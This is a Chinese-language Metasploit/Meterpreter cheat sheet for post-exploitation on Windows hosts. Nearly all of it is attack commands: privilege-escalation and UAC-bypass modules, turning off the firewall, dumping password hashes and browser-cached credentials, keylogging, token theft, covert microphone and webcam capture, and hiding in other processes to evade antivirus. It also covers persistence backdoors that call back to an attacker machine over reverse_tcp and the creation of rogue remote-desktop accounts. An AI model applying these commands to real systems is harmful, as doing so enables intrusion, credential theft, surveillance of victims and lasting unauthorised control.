1.普通用户利用漏洞获取权限
use exploit/windows/local/ms18_8120_win32k_privesc
2.关闭防火墙
netsh advfirewall set allprofiles state off
3.隐蔽穿越防火墙
4.本地提权
search local/ms
5.绕过UAC
use exploit/windows/local/bypassuac
use exploit/windows/local/bypassuac_injection
use windows/local/bypassuac_vbs
use windows/local/ask
6.获取system权限
7.缓存口令
①Chrome #获取Chrome缓存
run post/windows/gather/enum_chrome
②Firefox #获取Firefox缓存
run post/windows/gather/enum_firefox
③I.E #获取IE缓存
run post/windows/gather/enum_ie
8. 键盘记录:
①keyscan_start:开启键盘记录功能
②keyscan_dump:显示捕捉到的键盘记录信息
③keyscan_stop:停止键盘记录功能
run keylogrecorder
9.搜索:search
在目标主机上找到特定文件,可搜索整个系统中的特定文件。
10.域口令获取
①steal_token 试图窃取指定(PID)进程的令牌
②use incognito #加载incoginto功能(用来盗窃目标主机的令牌或是假冒用户)
③list_tokens –u #列出目标主机用户的可用令牌
④list_tokens –g #列出目标主机用户组的可用令牌
然后使用ps,查看pid号
1. sysinfo
2.post
run post/windows/gather/enum_applications #获取安装软件信息
run post/windows/gather/dumplinks #获取最近的文件操作
run scraper #获取常见信息 #保存在~/.msf4/logs/scripts/scraper/目录下
run post/windows/gather/enum_patches #补丁信息
run post/windows/gather/enum_domain #查找域控
3.摄像头信息
record_mic #音频录制
webcam_chat #查看摄像头接口
webcam_list #查看摄像头列表
webcam_stream #摄像头视频获取
1.psexec
先在meterpreter下使用
run post/windows/gather/smart_hashdump打印出账号和口令
记得先关闭靶机的防火墙,可以在shell中使用命令:
netsh advfirewall set allprofiles state off
2.execute
产生一个交互式的cmd:
我们可以使用-H参数来隐藏打开的应用
3.incognito
使用use incognito命令加载incognito功能,上文已经介绍
1.migrate
可以将meterpreter当前的进程移动到其他指定的进程中,这样做的好处是可以给meterpreter一个相对稳定的运行环境,同时可以很好的躲避杀毒软件
2.metsvc
Meterpreter提供2种方式的后门,一种是通过服务启动(metsvc),一种是通过启动项启动(persistence)。
通过服务(metsvc)启动方式,优点是命令简单方便,不需要设置太多参数。该后门在目标机器自启动一个“服务器”等攻击者连接,攻击者可以随时随地通过该后门加入目标机器。缺点就是其他攻击者扫描出该“服务器”的存在时,任何人便可以通过该后门直达目标机器内部。
3. persistence
通过启动项启动(persistence)的方式,其缺点便是参数较为复杂,当设置某项参数后,很有可能因为权限问题导致该设置项并未生效,并且无错误回显,导致持续化控制可能失败。当然,其优点也可圈可点。该方式是在目标机器上以反弹回连方式来连接攻击者的”服务器”,目标机器上的防火墙对于此等操作一般均会放行,因此后门的存活率较高。
-A 自动启动一个匹配的exploit / multi / handler来连接到代理
-L 如果未使用%TEMP%,则在目标主机中写入有效负载的位置。
-P 有效负载使用,默认为windows / meterpreter / reverse_tcp,默认生成的后门为32位,如果目标机器为64位时,留下的后门无法使用。
-S 作为服务自动启动代理程序(具有SYSTEM权限)
-T 要使用的备用可执行模板
-U 用户登录时自动启动代理 ,该方式会在HKCU\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。
-X 系统引导时自动启动代理程序,该方式会在HKLM\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。由于权限问题,会导致添加失败,后门将无法启动。因此,在非管理员权限或者未进行BypassUAC操作情况下,不推荐使用该参数。
-h 这个帮助菜单
-i 每次连接尝试之间的时间间隔(秒)
-p 运行Metasploit的系统正在侦听的端口 ,即设置反向连接的端口号
-r 运行Metasploit监听连接的系统的IP
例子:
留好后门之后,我们需要设置监听端口等配置信息等待后门的触发,将其反弹到我们的攻击机。
4.run vnc (远程控制软件类似于3389)
开启远程,可以实时监视受害者的操作情况
5.getgui(创建一个用户,客户端化)
常用命令:
run getgui –h #查看帮助
run getgui –e #开启远程桌面
run getgui -u Star_Cheng -p 123321 #添加用户
run getgui -f 4446 –e #3389端口转发到4446
例子:
首先先添加一个用户:
run getgui -u Star_Cheng -p 123321
执行远程桌面命令:
rdesktop -u Star_Cheng 10.10.10.141
接着输入密码即可连接上对方桌面。也可输入-p 参数将密码补上
也可以使用enable_rdp脚本来实现开启rdp和添加用户,在meterpreter使用如下命令:
run post/windows/manage/enable_rdp #开启远程桌面
run post/windows/manage/enable_rdp USERNAME=Star2 PASSWORD=123321 #添加用户RQ2
run post/windows/manage/enable_rdp FORWARD=true LPORT=4435 #将3389端口转发到9988